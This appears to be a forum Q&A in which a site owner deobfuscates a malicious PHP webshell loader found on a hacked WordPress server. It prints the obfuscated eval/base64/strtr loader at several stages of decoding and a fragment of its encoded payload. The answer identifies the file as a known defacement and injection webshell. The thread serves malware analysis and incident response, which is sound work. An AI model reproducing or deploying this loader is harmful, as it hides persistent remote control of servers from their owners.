# Analyzing Wordpress Hack: decrypting idca.php

Tags: php, wordpress, encryption, obfuscation

I found some nasty code on my server and I'm trying to decrypt it to figure out anything I can about this attack to prevent it in the future. The entire php file is a giant mess of a block of text, but before the charactervomit is this:

```
<?php /* Coded By ./Cyber404 & Encryted By Mr-GanDrunX */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x4A2B0;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTE0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>
```

I've worked it down by removing the hex:

```
<?php /* Coded By ./Cyber404 & Encryted By Mr-GanDrunX */$OOO000000=urldecode('fg6sbehpra4co_tnd');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x4A2B0;$O000O0O00=$OOO000O00($OOO0O0O00,'rb');$O0O00OO00($O000O0O00,0x514);$OO00O00O0=$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,0x17c),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));eval($OO00O00O0);return;?>
```

Resolved some of that and found this:

```
<?php /* Coded By ./Cyber404 & Encryted By Mr-GanDrunX */$OOO000000=urldecode('fg6sbehpra4co_tnd');$OOO0000O0=base64_decode;$OOO000O00=fopen;$O0O000O00=fget;$O0O000O0O=fgetc;$O0O000O00=fgets;$O0O00OO00=fread;$OOO00000O=strtr;$OOO0O0O00=__FILE__;$OO00O0000=0x4A2B0;eval(base64_decode('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTE0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>
```

These were resolved from the urldecode:
$OOO0000O0=base64_decode
$OOO000O00=fopen
$O0O000O00=fget
$O0O000O0O=fgetc
$O0O000O00=fgets
$O0O00OO00=fread
$OOO00000O=strtr

Then decoded this from ddecode.com:

```
eval(base64_decode('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTE0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='))
```

Decoded to this:

```
$O000O0O00=$OOO000O00($OOO0O0O00,'rb');$O0O00OO00($O000O0O00,0x514);$OO00O00O0=$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,0x17c),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));eval($OO00O00O0);
```

more replacing and it looks like this:

```
<?php /* Coded By ./Cyber404 & Encryted By Mr-GanDrunX */$OOO000000=urldecode('fg6sbehpra4co_tnd');$OOO0000O0=base64_decode;$OOO000O00=fopen;$O0O000O00=fget;$O0O000O0O=fgetc;$O0O000O00=fgets;$O0O00OO00=fread;$OOO00000O=strtr;$OOO0O0O00=__FILE__;$OO00O0000=0x4A2B0;$O000O0O00=fopen(__FILE__,'rb');fread(fopen(__FILE__,'rb'),0x514);$OO00O00O0=base64_decode(strtr(fread(fopen(__FILE__,'rb'),0x17c),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));eval(base64_decode(strtr(fread(fopen(__FILE__,'rb'),0x17c),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));return;?>
```

This is where I am stuck.. I tried to decode from the same site:

```
eval(base64_decode(strtr(fread(fopen(__FILE__,'rb'),0x17c),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')))
```

but it's throwing me an error

I think there might be more simplification I can do with

```
fread(fopen(__FILE__,'rb'),0x17c)
```

but I don't know where to go from here and honestly my head hurts from staring at this decryption on top of decryption on top of decryption with annoyingly similar var names. Has anyone experienced something like this?

Edit: Small addition, right after the php closes and before the character vomit, it is somewhat legible, showing what looks like semi-obfuscated bash commands:

```
root@Hiddenymouz:~#./hiddenymouz45DSFJK4sdfkmlskv2jjd5lsdh74ks/25akdhelals,fnfje5aldlfg46duf96msvc/hs/nrjdhkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHeEXHr8Pkr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==
```

Comment: is this the full code? do you mean this?

http://www.unphp.net/decode/80efdfa4ccacbcf18c21512db1afd509/

Comment: That does look like that is it.

Comment: I have added it as answer so you can accept is as correct answer. If there are any unresolved questions about the sourcecode of this exploit and what it does, please let me know and I will describe it so your last questions are also resolved regarding this php exploit script

Answer (score 3, accepted):

this seems to be the full (unencrypted) sourcecode

http://unphp.net/decode/80efdfa4ccacbcf18c21512db1afd509

think this is the webshell php exploit script used by the Indonesian Cyber Army for defacing websites, doing (my)sql injections/exploits/dumping, ddos, and much more

includes the shell script by RAB3OUN

may be the `Config Shell Priv8 SCR` script recoded by X'1n73ct